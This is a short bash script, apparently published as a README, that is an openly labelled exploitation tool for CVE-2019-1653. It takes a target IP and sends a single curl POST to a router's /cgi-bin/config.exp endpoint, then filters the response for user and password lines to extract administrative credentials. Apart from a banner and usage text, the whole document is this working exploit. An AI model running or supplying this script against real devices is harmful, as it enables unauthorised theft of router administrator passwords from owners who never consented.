README.md
Rendering markdown...
#!/bin/bash
#
# "We're here to observe another kind of code. The bad code." - Root, Person of Interest
#
IP=$1
echo ""
echo ""
echo " ____ _ ____ _ _ _
/ ___(_)___ ___ ___/ ___| _ __ (_) | |
| | | / __|/ __/ _ \___ \| '_ \| | | |
| |___| \__ \ (_| (_) |__) | |_) | | | |
\____|_|___/\___\___/____/| .__/|_|_|_|
|_| "
echo "--------------------------------------------"
echo "An exploitation tool to extract password Information using CVE-2019-1653."
echo "by Shahee Mirza ## Twitter: @shaheemirza"
echo "Thanks to RedTeam Pentesting GmbH"
echo "--------------------------------------------"
if [ -z "$IP" ]
then
echo "++++++++++++++++++++++++++++++++++++++++++++"
echo "USES: ./ciscospill.sh IP"
echo "E.G.: ./ciscospill.sh 192.168.1.1"
echo "++++++++++++++++++++++++++++++++++++++++++++"
exit
fi
echo ""
echo "Exploiting: $IP"
echo ""
echo "++++++++++++++++++++++++++++++++++++++++++++"
echo "Administrative Password Information:"
echo "++++++++++++++++++++++++++++++++++++++++++++"
echo ""
curl -s -k -A "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0" -X POST --data 'submitbkconfig=0' 'https://'$IP'/cgi-bin/config.exp' 2>&1 | grep 'user \|password '
echo ""
echo "--------------------------------------------"
echo ""